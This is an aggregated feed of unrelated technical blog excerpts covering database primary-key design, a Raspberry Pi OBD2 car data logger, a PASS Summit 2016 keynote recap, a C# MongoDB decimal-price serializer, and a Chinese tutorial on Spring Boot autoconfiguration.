Let's plug in some numbers, and put 100M records into myinfo. Let's also say that an average search returns 5,000 records.

Schema 1: (Index lookup + Primary Key lookup from index):
Lg (100M) * 1 + 5000 * Lg (100M) = 132903 B-tree operations.

Schema 2: (Primary Key lookup only):
Lg(100M) * 1 = 26 B-tree operations. (Note that this single B-tree ingress operation will fetch 5K records)

So, for this query, Schema 2 is over 5,000 times faster than Schema 1. So, if Schema 2 is answered in a second, Schema 1 will take nearly two hours.

Note that we've played a bit of a trick here, and now lookups on "ID" are relatively expensive. But there are many situations where a table identifier is rarely or never looked up, but used as the primary key as "InnoDB needs a primary key".

See also Schema Design Matters

          Some simple schema design mistakes        
1. Not paying attention when determining the primary key, particularly if using index-organized primary storage structures like InnoDB or Oracle's "ORGANIZATION INDEX" tables.

2. Thinking that defining an index on multiple columns means that each column is "indexed". Multi-column indexes give you a search structure that is organized from the leftmost column to the rightmost column in the CREATE INDEX (or KEY()) statement, so if the leftmost column(s) aren't used in a given query, columns in the "middle" can't be used.
          Comment on Why I am Tempted to Replace Cassandra With DynamoDB by Matt Hardy        
How about Cassandra vs Couchbase or MongoDB?
          Will SQL just die already?        
With tons of new No-SQL database offerings everyday, developers & architects have a lot of options. Cassandra, Mongodb, Couchdb, Dynamodb & Firebase to name a few. Join 33,000 others and follow Sean Hull on twitter @hullsean. What’s more in the data warehouse space, you have Hadoop, which can churn through terabytes of data and get … Continue reading Will SQL just die already?
          Playing with Pi        

A few months ago I decided to join the party and pickup a Raspberry Pi. It's a $25 full fledged ARM based computer the size of a credit card. There's also a $35 version, of which I ended up buying a handful so far. Due to the cost, this allows you to use a computer in dedicated applications where it otherwise wouldn't be justified or practical. Since then I've been pouring over the different things people have done with their Pi. Here are some that interest me:

  • Setting up security cameras or other dedicated cameras like a traffic cam or bird feeder camera
  • RaspyFi - streaming music player
  • Offsite backup
  • Spotify server
  • Carputer - blackbox for your car
  • Dashcam for my car
  • Home alarm system
  • Digital signage for the family business
  • Console emulator for old school consoles
  • Grocery inventory tracker

Since the Pi runs an ARM based version of Linux, I'm already familiar with practically everything on that list. The OS I've loaded is Raspbian, a Debian variant. This makes it a lot easier to get up and running with.

After recently divesting myself of some large business responsibilities, I've had more personal time to dedicate to things like this. Add in the vacation I took during Christmas and New Years and I had the perfect recipe to dive head-first into a Pi project. What I chose was something that I've always wanted.

The database and Big Data lover in me wants data, lots of it. So I've gone with building a black box for my car that runs all the time the car is on, and logs as much data as I can capture. This includes:

  • OBD2
  • GPS
  • Dashcam
  • and more

Once you've got a daemon running, and the inputs are being saved then the rest is all just inputs. Doesn't matter what it is. It's just input data.

My initial goal is to build a blackbox that constantly logs OBD2 data and stores it to a database. Looking around at what's out there for OBD2 software, I don't see anything that's built for long term logging. All the software out there is meant for 2 use cases: 1)live monitoring 2)tuning the ECU to get more power out of the car. What I want is a 3rd use case: long term logging of all available OBD2 data to a database for analysis.

In order to store all this data I decided to build an OBD2 storage architecture that's comprised of

  • MySQL database
  • JSON + REST web services API
  • SDK that existing OBD2 software would use to store the data it's capturing
  • Wrapping up existing open source OBD2 capture data so it runs as a daemon on the Pi
  • Logging data to a local storage buffer, which then gets synced to the aforementioned cloud storage service when there's an internet connection.

Right now I'm just doing this for myself. But I'm also reaching out to developers of OBD2 software to gauge interest in adding this storage service to their work. In addition to the storage, an API can be added for reading back the data such as pulling DTS (error) codes, getting trends and summary data, and more.

The first SDK I wrote was in Python. It's available on GitHub. It includes API calls to register an email address to get an API key. After that, there are some simple logging functions to save a single PID (OBD2 data point such as RPM or engine temp). Since this has to run without an internet connection I've implemented a buffer. The SDK writes to a buffer in local storage and when there's any internet connection a background sync daemon pulls data off the buffer, sends it to the API and removes the item from the buffer. Since this is all JSON data and very simple key:value data I've gone with a NoSQL approach and used MongoDB for the buffer.

The API is built in PHP and runs on a standard Linux VPS in apache. At this point the entire stack has been built. The code's nowhere near production-ready and is missing some features, but it works enough to demo. I've built a test utility that simulates a client car logging 10 times/second. Each time it's logging 10 different PIDs. This all builds up in the local buffer and the sync script then clears it out and uploads it to the API. With this estimate, the client generates 100 data points per second. For a car being driven an average of 101 minutes per day, that's 606,000 data points per day.

The volume of data will add up fast. For starters, the main database table I'm using stores all the PIDs as strings and stores each one as a separate record. In the future, I'll evaluate pivoting this data so that each PID has it's own field (and appropriate data type) in a table. We'll see which method proves more efficient and easier to query. The OBD2 spec lists all the possible PIDs. Car manufacturers aren't required to use them all, and they can add in their own proprietary ones too. Hence my ambivalence for now about creating a logging table that contains a field for each PID. If most of the fields are empty, that's a lot of wasted storage. 

Systems integration is much more of a factor in this project than coding each underlying piece. Each underlying piece, from what I've found, has already been coded somewhere by some enthusiast. The open source Python code already exists for reading OBD2 data. That solves a major coding headache and makes it easier to plug my SDK into it.

There are some useful smartphone apps that can connect to a Bluetooth OBD2 reader to pull the data. Even if they were to use my SDK, it's still not an ideal solution for logging. In order to log this data, you need a dedicated device that's always on when the car's on and always logging. Using a smartphone can get you most of the way there, but there'll be gaps. That's why I'm focusing on using my Pi as a blackbox for this purpose.


          PASS Summit 2016 – Blogging again – Keynote 1        

.So I’m back at the PASS Summit, and the keynote’s on! We’re all getting ready for a bunch of announcements about what’s coming in the world of the Microsoft Data Platform.

First up – Adam Jorgensen. Some useful stats about PASS, and this year’s PASSion Award winner, Mala Mahadevan (@sqlmal)

There are tweets going on using #sqlpass and #sqlsummit – you can get a lot of information from there.

Joseph Sirosh – Corporate Vice President for the Data Group, Microsoft – is on stage now. He’s talking about the 400M children in India (that’s more than all the people in the United States, Mexico, and Canada combined), and the opportunities because of student drop-out. Andhra Pradesh is predicting student drop-out using new ACID – Algorithms, Cloud, IoT, Data. I say “new” because ACID is an acronym database professionals know well.

He’s moving on to talk about three patterns: Intelligence DB, Intelligent Lake, Deep Intelligence.

Intelligence DB – taking the intelligence out of the application and moving it into the database. Instead of the application controlling the ‘smarts’, putting them into the database provides models, security, and a number of other useful benefits, letting any application on top of it. It can use SQL Server, particularly with SQL Server R Services, and support applications whether in the cloud, on-prem, or hybrid.

Rohan Kumar – General Manager of Database Scripts – is up now. Fully Managed HTAP in Azure SQL DB hits General Availability on Nov 15th. HTAP is Hybrid Transactional / Analytical Processing, which fits really nicely with my session on Friday afternoon. He’s doing a demo showing the predictions per second (using SQL Server R Services), and how it easily reaches 1,000,000 per second. You can see more of this at this post, which is really neat.

Justin Silver, a Data Scientist from PROS comes onto stage to show how a customer of theirs handles 100 million price requests every day, responding to each one in under 200 milliseconds. Again we hear about SQL Server R Services, which pushes home the impact of this feature in SQL 2016. Justin explains that using R inside SQL Server 2016, they can achieve 100x better performance. It’s very cool stuff.

Rohan’s back, showing a Polybase demo against MongoDB. I’m sitting next to Kendra Little (@kendra_little) who is pretty sure it’s the first MongoDB demo at PASS, and moving on to show SQL on Linux. He not only installed SQL on Linux, but then restored a database from a backup that was taken on a Windows box, connected to it from SSMS, and ran queries. Good stuff.

Back to Joseph, who introduces Kalle Hiitola from Next Games – a Finnish gaming company – who created a iOS game that runs on Azure Media Services and DocumentDB, using BizSpark. 15 million installs, with 120GB of new data every day. 11,500 DocumentDB requests per second, and 43 million “Walkers” (zombies in their ‘Walking Dead’ game) eliminated every day. 1.9 million matches (I don’t think it’s about zombie dating though) per day. Nice numbers.

Now onto Intelligent Lake. Larger volumes of data than every before takes a different kind of strategy.

Scott Smith – VP of Product Development from Integral Analytics – comes in to show how Azure SQL Data Warehouse has allowed them to scale like never before in the electric-energy industry. He’s got some great visuals.

Julie Koesmarno on stage now. Can’t help but love Julie – she’s come a long way in the short time since leaving LobsterPot Solutions. She’s done Sentiment Analysis on War & Peace. It’s good stuff, and Julie’s demo is very popular.

Deep Intelligence is using Neural Networks to recognise components in images. eSmart Systems have a drone-based system for looking for faults in power lines. It’s got a familiar feel to it, based on discussions we’ve been having with some customers (but not with power lines).

Using R Services with ML algorithms, there’s some great options available…

Jen Stirrup on now. She’s talking about Pokemon Go and Azure ML. I don’t understand the Pokemon stuff, but the Machine Learning stuff makes a lot of sense. Why not use ML to find out where to find Pokemon?

There’s an amazing video about using Cognitive Services to help a blind man interpret his surroundings. For me, this is the best demo of the morning, because it’s where this stuff can be really useful.

SQL is changing the world.

@rob_farley


          Eclipse Newsletter - BIRT and Big Data        
Find out how to use BIRT to visualize data from Hadoop, Cassandra and MongoDB in this month's issue of the Eclipse Newsletter.
          Yet another MongoDB Map Reduce tutorial | MongoVUE        
http://www.mongovue.com/2010/11/03/yet-another-mongodb-map-reduce-tutorial/
          Saving prices as decimal in mongodb        

When working with prices in C#, you should always work with the 'decimal' type.
Working with the 'Double' type can lead to a variety of rounding errors when doing calculations with them, and is more intended for mathematical equations.

(I don't want to go into details about what problems this can cause exactly, but you can read more about it here :
http://stackoverflow.com/questions/2129804/rounding-double-values-in-c-sharp
http://stackoverflow.com/questions/15330988/double-vs-decimal-rounding-in-c-sharp
http://stackoverflow.com/questions/693372/what-is-the-best-data-type-to-use-for-money-in-c
http://pagehalffull.wordpress.com/2012/10/30/rounding-doubles-in-c/ )

I am currently working on a project that involves commerce and prices, so naturally I used 'decimal' for all price types.
Then I headed to my db, which in my case is mongodb, and the problem arose.
MongoDB doesn't support 'decimal'!! It only supports the double type.

Since I rather avoid saving it as a double for reasons stated above, I had to think of a better solution.
I decided to save all the prices in the db as Int32 saving the prices in 'cents'.

This means I just need to multiply the values by 100 when inserting to the db, and dividing by 100 when retrieving. This should never cause any rounding problems, and is pretty much straight-forward. I even don't need to worry about sorting, or any other query for that matter.

But... I don't want ugly code doing all these conversions from cents to dollars in every place...

I'm using the standard C# mongo db driver (https://github.com/mongodb/mongo-csharp-driver), which gives me the ability to write a custom serializer for a specific field.
This is a great solution, since it's the lowest level part of the code that deals with the db, and that means all my entities will be using 'decimal' everywhere.

This is the code for the serializer :

[BsonSerializer(typeof(MongoDbMoneyFieldSerializer))]
public class MongoDbMoneyFieldSerializer : IBsonSerializer
{
public object Deserialize(BsonReader bsonReader, Type nominalType, IBsonSerializationOptions options)
{
var dbData = bsonReader.ReadInt32();
return (decimal)dbData / (decimal)100;
}

public object Deserialize(BsonReader bsonReader, Type nominalType, Type actualType, IBsonSerializationOptions options)
{
var dbData = bsonReader.ReadInt32();
return (decimal)dbData / (decimal)100;
}

public IBsonSerializationOptions GetDefaultSerializationOptions()
{
return new DocumentSerializationOptions();
}

public void Serialize(BsonWriter bsonWriter, Type nominalType, object value, IBsonSerializationOptions options)
{
var realValue = (decimal) value;
bsonWriter.WriteInt32(Convert.ToInt32(realValue * 100));
}
}


And then all you need to do is add the custom serializer to the fields which are prices, like this:

public class Product
{
public string Title{ get; set; }
public string Description { get; set; }

[BsonSerializer(typeof(MongoDbMoneyFieldSerializer))]
public decimal Price { get; set; }

[BsonSerializer(typeof(MongoDbMoneyFieldSerializer))]
public decimal MemberPrice { get; set; }

public int Quantity { get; set; }
}

That's all there is to it.


          Big Data – infrastructure DBA – MongoDB and cloud environment        
A Medical imaging SAAS company is seeking for a talented DBA (infrastructure). You will work with big data, Scale the company's data set to millions of samples, perform large scale data analysis and research, handle performance, scale, availability, accuracy and monitoring.
          Laravel MVC frameWork         
MVC frameWork 一直以來,我一直使用 smarty +Adodb
          Super Simple Storage for Social Web Data with MongoDB (Computing Twitter Influence, Part 4)        
In the last few posts for this series on computing twitter influence, we’ve reviewed some of the considerations in calculating a base metric for influence and how to acquire the necessary data to begin analysis. This post finishes up all of the prerequisite machinery before the real data science fun begins by introducing MongoDB as a […]
          ã€ŠSpring Boot极简教程》第5ç«  Spring Boot自动配置原理【转】        
from:http://www.jianshu.com/p/ccadc2bdb6d7

第5章 Spring Boot自动配置原理

5.1 SpringBoot的核心组件模块

首先,我们来简单统计一下SpringBoot核心工程的源码java文件数量:

我们cd到spring-boot-autoconfigure工程根目录下。执行

$ tree | grep -c .java$
模块 java文件数
spring-boot 551
spring-boot-actuator 423
spring-boot-autoconfigure 783
spring-boot-devtools 169
spring-boot-cli 180
spring-boot-tools 355

我们可以看到有783个java文件。spring-boot核心工程有551个java文件。从上面的java文件数量大致可以看出,SpringBoot技术框架的核心组成部分:

spring-boot-autoconfigure spring-boot spring-boot-tools

我们把SpringBoot源码导入IntelliJ IDEA,查看artifact的全部依赖关系。

IDEA有个Maven Projects窗口,一般在右侧能够找到,如果没有可以从菜单栏打开:View>Tool Windows>Maven Projects;

选择要分析的maven module(idea的module相当于eclipse的project),右击show dependencies,会出来该module的全部依赖关系图,非常清晰细致。

例如,spring-boot-starter-freemarker的依赖图分析如下:


在spring-boot-build 的pom中,我们可以看到:

           <modules>                 <module>spring-boot-dependencies</module>                 <module>spring-boot-parent</module>                 <module>spring-boot-tools</module>                 <module>spring-boot</module>                 <module>spring-boot-test</module>                 <module>spring-boot-autoconfigure</module>                 <module>spring-boot-test-autoconfigure</module>                 <module>spring-boot-actuator</module>                 <module>spring-boot-devtools</module>                 <module>spring-boot-docs</module>                 <module>spring-boot-starters</module>                 <module>spring-boot-actuator-docs</module>                 <module>spring-boot-cli</module>             </modules>

其中,在spring-boot-dependencies中,SpringBoot项目维护了一份庞大依赖。这些依赖的版本都是经过实践,测试通过,不会发生依赖冲突的。就这样一个事情,就大大减少了Spring开发过程中,出现jar包冲突的概率。spring-boot-parent依赖spring-boot-dependencies。

下面我们简要介绍一下SpringBoot子modules。

spring-boot

SpringBoot核心工程。

spring-boot-starters

是SpringBoot的启动服务工程。

spring-boot-autoconfigure

是SpringBoot实现自动配置的核心工程。

spring-boot-actuator

提供SpringBoot应用的外围支撑性功能。 比如:

  • Endpoints,SpringBoot应用状态监控管理
  • HealthIndicator,SpringBoot应用健康指示表
  • 提供metrics支持
  • 提供远程shell支持

spring-boot-tools

提供了SpringBoot开发者的常用工具集。诸如,spring-boot-gradle-plugin,spring-boot-maven-plugin就是这个工程里面的。

spring-boot-cli

是Spring Boot命令行交互工具,可用于使用Spring进行快速原型搭建。你可以用它直接运行Groovy脚本。如果你不喜欢Maven或Gradle,Spring提供了CLI(Command Line Interface)来开发运行Spring应用程序。你可以使用它来运行Groovy脚本,甚至编写自定义命令。

5.2 SpringBoot Starters

Spring boot中的starter概念是非常重要的机制,能够抛弃以前繁杂的配置,统一集成进starter,应用者只需要引入starter jar包,spring boot就能自动扫描到要加载的信息。

starter让我们摆脱了各种依赖库的处理,需要配置各种信息的困扰。Spring Boot会自动通过classpath路径下的类发现需要的Bean,并织入bean。

例如,如果你想使用Spring和用JPA访问数据库,你只要依赖 spring-boot-starter-data-jpa 即可。

目前,github上spring-boot项目的最新的starter列表spring-boot/spring-boot-starters如下:

spring-boot-starter spring-boot-starter-activemq spring-boot-starter-actuator spring-boot-starter-amqp spring-boot-starter-aop spring-boot-starter-artemis spring-boot-starter-batch spring-boot-starter-cache spring-boot-starter-cloud-connectors spring-boot-starter-data-cassandra spring-boot-starter-data-couchbase spring-boot-starter-data-elasticsearch spring-boot-starter-data-jpa spring-boot-starter-data-ldap spring-boot-starter-data-mongodb spring-boot-starter-data-mongodb-reactive spring-boot-starter-data-neo4j spring-boot-starter-data-redis spring-boot-starter-data-rest spring-boot-starter-data-solr spring-boot-starter-freemarker spring-boot-starter-groovy-templates spring-boot-starter-hateoas spring-boot-starter-integration spring-boot-starter-jdbc spring-boot-starter-jersey spring-boot-starter-jetty spring-boot-starter-jooq spring-boot-starter-jta-atomikos spring-boot-starter-jta-bitronix spring-boot-starter-jta-narayana spring-boot-starter-log4j2 spring-boot-starter-logging spring-boot-starter-mail spring-boot-starter-mobile spring-boot-starter-mustache spring-boot-starter-parent spring-boot-starter-reactor-netty spring-boot-starter-security spring-boot-starter-social-facebook spring-boot-starter-social-linkedin spring-boot-starter-social-twitter spring-boot-starter-test spring-boot-starter-thymeleaf spring-boot-starter-tomcat spring-boot-starter-undertow spring-boot-starter-validation spring-boot-starter-web spring-boot-starter-web-services spring-boot-starter-webflux spring-boot-starter-websocket

(源代码目录执行shell:l|awk '{print $9}', l|awk '{print $9}'|grep -c 'starter')

共52个。每个starter工程里面的pom描述有相应的介绍。具体的说明,参考官网文档[1]。关于这些starters的使用例子,可以参考spring-boot/spring-boot-samples

比如说,spring-boot-starter是:

Core starter, including auto-configuration support, logging and YAML

这是Spring Boot的核心启动器,包含了自动配置、日志和YAML。它的项目依赖图如下:



可以看出,这些starter只是配置,真正做自动化配置的代码的是在spring-boot-autoconfigure里面。同时spring-boot-autoconfigure依赖spring-boot工程,这个spring-boot工程是SpringBoot的核心。

SpringBoot会基于你的classpath中的jar包,试图猜测和配置您可能需要的bean。

例如,如果你的classpath中有tomcat-embedded.jar,你可能会想要一个TomcatEmbeddedServletContainerFactory Bean (SpringBoot通过获取EmbeddedServletContainerFactory来启动对应的web服务器。常用的两个实现类是TomcatEmbeddedServletContainerFactory和JettyEmbeddedServletContainerFactory)。

其他的所有基于Spring Boot的starter都依赖这个spring-boot-starter。比如说spring-boot-starter-actuator的依赖树,如下图:


5.3 @EnableAutoConfiguration自动配置原理

通过@EnableAutoConfiguration启用Spring应用程序上下文的自动配置,这个注解会导入一个EnableAutoConfigurationImportSelector的类,而这个类会去读取一个spring.factories下key为EnableAutoConfiguration对应的全限定名的值。

这个spring.factories里面配置的那些类,主要作用是告诉Spring Boot这个stareter所需要加载的那些xxxAutoConfiguration类,也就是你真正的要自动注册的那些bean或功能。然后,我们实现一个spring.factories指定的类,标上@Configuration注解,一个starter就定义完了。

如果想从自己的starter种读取应用的starter工程的配置,只需要在入口类上加上如下注解即可:

@EnableConfigurationProperties(MyProperties.class)

读取spring.factories文件的实现

是通过org.springframework.core.io.support.SpringFactoriesLoader实现。

SpringFactoriesLoader的实现类似于SPI(Service Provider Interface,在java.util.ServiceLoader的文档里有比较详细的介绍。java SPI提供一种服务发现机制,为某个接口寻找服务实现的机制。有点类似IOC的思想,就是将装配的控制权移到程序之外,在模块化设计中这个机制尤其重要[3])。

SpringFactoriesLoader会加载classpath下所有JAR文件里面的META-INF/spring.factories文件。

其中加载spring.factories文件的代码在loadFactoryNames方法里:

public static final String FACTORIES_RESOURCE_LOCATION = "META-INF/spring.factories";  ....      public static List<String> loadFactoryNames(Class<?> factoryClass, ClassLoader classLoader) {         String factoryClassName = factoryClass.getName();         try {             Enumeration<URL> urls = (classLoader != null ? classLoader.getResources(FACTORIES_RESOURCE_LOCATION) :                     ClassLoader.getSystemResources(FACTORIES_RESOURCE_LOCATION));             List<String> result = new ArrayList<>();             while (urls.hasMoreElements()) {                 URL url = urls.nextElement();                 Properties properties = PropertiesLoaderUtils.loadProperties(new UrlResource(url));                 String factoryClassNames = properties.getProperty(factoryClassName);                 result.addAll(Arrays.asList(StringUtils.commaDelimitedListToStringArray(factoryClassNames)));             }             return result;         }         catch (IOException ex) {             throw new IllegalArgumentException("Unable to load [" + factoryClass.getName() +                     "] factories from location [" + FACTORIES_RESOURCE_LOCATION + "]", ex);         }     }

通过org.springframework.boot.autoconfigure.AutoConfigurationImportSelector里面的getCandidateConfigurations方法,获取到候选类的名字List<String>。该方法代码如下:

    protected List<String> getCandidateConfigurations(AnnotationMetadata metadata,             AnnotationAttributes attributes) {         List<String> configurations = SpringFactoriesLoader.loadFactoryNames(                 getSpringFactoriesLoaderFactoryClass(), getBeanClassLoader());         Assert.notEmpty(configurations,                 "No auto configuration classes found in META-INF/spring.factories. If you "                         + "are using a custom packaging, make sure that file is correct.");         return configurations;     }

其中,getSpringFactoriesLoaderFactoryClass()方法直接返回的是EnableAutoConfiguration.class, 代码如下:

    protected Class<?> getSpringFactoriesLoaderFactoryClass() {         return EnableAutoConfiguration.class;     }

所以,getCandidateConfigurations方法里面的这段代码:

List<String> configurations = SpringFactoriesLoader.loadFactoryNames(                 getSpringFactoriesLoaderFactoryClass(), getBeanClassLoader());

会过滤出key为org.springframework.boot.autoconfigure.EnableAutoConfiguration的全限定名对应的值。全限定名都使用如下命名方法:

包名.外部类名 包名.外部类名$内部类名  e.g:  org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration

SpringBoot中的META-INF/spring.factories(完整路径:spring-boot/spring-boot-autoconfigure/src/main/resources/META-INF/spring.factories)中关于EnableAutoConfiguration的这段配置如下:

# Auto Configure org.springframework.boot.autoconfigure.EnableAutoConfiguration=\ org.springframework.boot.autoconfigure.admin.SpringApplicationAdminJmxAutoConfiguration,\ org.springframework.boot.autoconfigure.aop.AopAutoConfiguration,\ org.springframework.boot.autoconfigure.amqp.RabbitAutoConfiguration,\ org.springframework.boot.autoconfigure.batch.BatchAutoConfiguration,\ org.springframework.boot.autoconfigure.cache.CacheAutoConfiguration,\ org.springframework.boot.autoconfigure.cassandra.CassandraAutoConfiguration,\ org.springframework.boot.autoconfigure.cloud.CloudAutoConfiguration,\ org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration,\ org.springframework.boot.autoconfigure.context.MessageSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration,\ org.springframework.boot.autoconfigure.couchbase.CouchbaseAutoConfiguration,\ org.springframework.boot.autoconfigure.dao.PersistenceExceptionTranslationAutoConfiguration,\ org.springframework.boot.autoconfigure.data.cassandra.CassandraDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.cassandra.CassandraRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.couchbase.CouchbaseDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.couchbase.CouchbaseRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.elasticsearch.ElasticsearchAutoConfiguration,\ org.springframework.boot.autoconfigure.data.elasticsearch.ElasticsearchDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.elasticsearch.ElasticsearchRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.jpa.JpaRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.ldap.LdapDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.ldap.LdapRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.MongoDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.MongoRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.ReactiveMongoDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.ReactiveMongoRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.neo4j.Neo4jDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.neo4j.Neo4jRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.solr.SolrRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.redis.RedisAutoConfiguration,\ org.springframework.boot.autoconfigure.data.redis.RedisRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.rest.RepositoryRestMvcAutoConfiguration,\ org.springframework.boot.autoconfigure.data.web.SpringDataWebAutoConfiguration,\ org.springframework.boot.autoconfigure.elasticsearch.jest.JestAutoConfiguration,\ org.springframework.boot.autoconfigure.flyway.FlywayAutoConfiguration,\ org.springframework.boot.autoconfigure.freemarker.FreeMarkerAutoConfiguration,\ org.springframework.boot.autoconfigure.gson.GsonAutoConfiguration,\ org.springframework.boot.autoconfigure.h2.H2ConsoleAutoConfiguration,\ org.springframework.boot.autoconfigure.hateoas.HypermediaAutoConfiguration,\ org.springframework.boot.autoconfigure.hazelcast.HazelcastAutoConfiguration,\ org.springframework.boot.autoconfigure.hazelcast.HazelcastJpaDependencyAutoConfiguration,\ org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration,\ org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration,\ org.springframework.boot.autoconfigure.integration.IntegrationAutoConfiguration,\ org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.JdbcTemplateAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.JndiDataSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.XADataSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.DataSourceTransactionManagerAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.JmsAutoConfiguration,\ org.springframework.boot.autoconfigure.jmx.JmxAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.JndiConnectionFactoryAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.activemq.ActiveMQAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.artemis.ArtemisAutoConfiguration,\ org.springframework.boot.autoconfigure.groovy.template.GroovyTemplateAutoConfiguration,\ org.springframework.boot.autoconfigure.jersey.JerseyAutoConfiguration,\ org.springframework.boot.autoconfigure.jooq.JooqAutoConfiguration,\ org.springframework.boot.autoconfigure.kafka.KafkaAutoConfiguration,\ org.springframework.boot.autoconfigure.ldap.embedded.EmbeddedLdapAutoConfiguration,\ org.springframework.boot.autoconfigure.ldap.LdapAutoConfiguration,\ org.springframework.boot.autoconfigure.liquibase.LiquibaseAutoConfiguration,\ org.springframework.boot.autoconfigure.mail.MailSenderAutoConfiguration,\ org.springframework.boot.autoconfigure.mail.MailSenderValidatorAutoConfiguration,\ org.springframework.boot.autoconfigure.mobile.DeviceResolverAutoConfiguration,\ org.springframework.boot.autoconfigure.mobile.DeviceDelegatingViewResolverAutoConfiguration,\ org.springframework.boot.autoconfigure.mobile.SitePreferenceAutoConfiguration,\ org.springframework.boot.autoconfigure.mongo.embedded.EmbeddedMongoAutoConfiguration,\ org.springframework.boot.autoconfigure.mongo.MongoAutoConfiguration,\ org.springframework.boot.autoconfigure.mongo.ReactiveMongoAutoConfiguration,\ org.springframework.boot.autoconfigure.mustache.MustacheAutoConfiguration,\ org.springframework.boot.autoconfigure.orm.jpa.HibernateJpaAutoConfiguration,\ org.springframework.boot.autoconfigure.reactor.core.ReactorCoreAutoConfiguration,\ org.springframework.boot.autoconfigure.security.SecurityAutoConfiguration,\ org.springframework.boot.autoconfigure.security.SecurityFilterAutoConfiguration,\ org.springframework.boot.autoconfigure.security.FallbackWebSecurityAutoConfiguration,\ org.springframework.boot.autoconfigure.security.oauth2.OAuth2AutoConfiguration,\ org.springframework.boot.autoconfigure.sendgrid.SendGridAutoConfiguration,\ org.springframework.boot.autoconfigure.session.SessionAutoConfiguration,\ org.springframework.boot.autoconfigure.social.SocialWebAutoConfiguration,\ org.springframework.boot.autoconfigure.social.FacebookAutoConfiguration,\ org.springframework.boot.autoconfigure.social.LinkedInAutoConfiguration,\ org.springframework.boot.autoconfigure.social.TwitterAutoConfiguration,\ org.springframework.boot.autoconfigure.solr.SolrAutoConfiguration,\ org.springframework.boot.autoconfigure.thymeleaf.ThymeleafAutoConfiguration,\ org.springframework.boot.autoconfigure.transaction.TransactionAutoConfiguration,\ org.springframework.boot.autoconfigure.transaction.jta.JtaAutoConfiguration,\ org.springframework.boot.autoconfigure.validation.ValidationAutoConfiguration,\ org.springframework.boot.autoconfigure.web.client.RestTemplateAutoConfiguration,\ org.springframework.boot.autoconfigure.web.reactive.HttpHandlerAutoConfiguration,\ org.springframework.boot.autoconfigure.web.reactive.ReactiveWebServerAutoConfiguration,\ org.springframework.boot.autoconfigure.web.reactive.WebFluxAnnotationAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.HttpEncodingAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.MultipartAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration,\ org.springframework.boot.autoconfigure.websocket.WebSocketAutoConfiguration,\ org.springframework.boot.autoconfigure.websocket.WebSocketMessagingAutoConfiguration,\ org.springframework.boot.autoconfigure.webservices.WebServicesAutoConfiguration

当然了,这些AutoConfiguration不是所有都会加载的,会根据AutoConfiguration上的@ConditionalOnClass等条件,再进一步判断是否加载。我们下文通过FreeMarkerAutoConfiguration实例来分析整个自动配置的过程。

5.4 FreeMarkerAutoConfiguration自动配置的实例分析

我们首先看spring-boot-starter-freemarker工程,目录结构如下:

. ├── pom.xml ├── spring-boot-starter-freemarker.iml └── src     └── main         └── resources             └── META-INF                 └── spring.provides  4 directories, 3 files

我们可以看出,这个工程没有任何Java代码,只有两个文件:pom.xml跟spring.provides。starter本身在你的应用程序中实际上是空的。

其中,
spring.provides文件

provides: freemarker,spring-context-support

主要是给这个starter起个好区分的名字。

Spring Boot 通过starter对项目的依赖进行统一管理. starter利用了maven的传递依赖解析机制,把常用库聚合在一起, 组成了针对特定功能而定制的依赖starter。

我们可以使用IDEA提供的maven依赖图分析的功能(如下图),得到spring-boot-starter-freemarker依赖的module。


IDEA提供的maven依赖图分析

spring-boot-starter-freemarker依赖的module

从上面的依赖图,我们可以清晰看出其间依赖关系。

当Spring Boot Application中自动配置EnableAutoConfiguration的相关类执行完毕之后,Spring Boot会进一步解析对应类的配置信息。如果我们配置了spring-boot-starter-freemarker ,maven就会通过这个starter所依赖的spring-boot-autoconfigure,自动传递到spring-boot-autoconfigure工程中。

我们来简单分析一下spring-boot-autoconfigure工程的架构。

其中,FreeMarker的自动配置类是org.springframework.boot.autoconfigure.freemarker.FreeMarkerAutoConfiguration。

下面我们来简要分析一下FreeMarkerAutoConfiguration这个类。

在FreeMarkerAutoConfiguration类上面有四行注解:

@Configuration @ConditionalOnClass({ freemarker.template.Configuration.class,         FreeMarkerConfigurationFactory.class }) @AutoConfigureAfter(WebMvcAutoConfiguration.class) @EnableConfigurationProperties(FreeMarkerProperties.class) public class FreeMarkerAutoConfiguration {     ... }

其中,
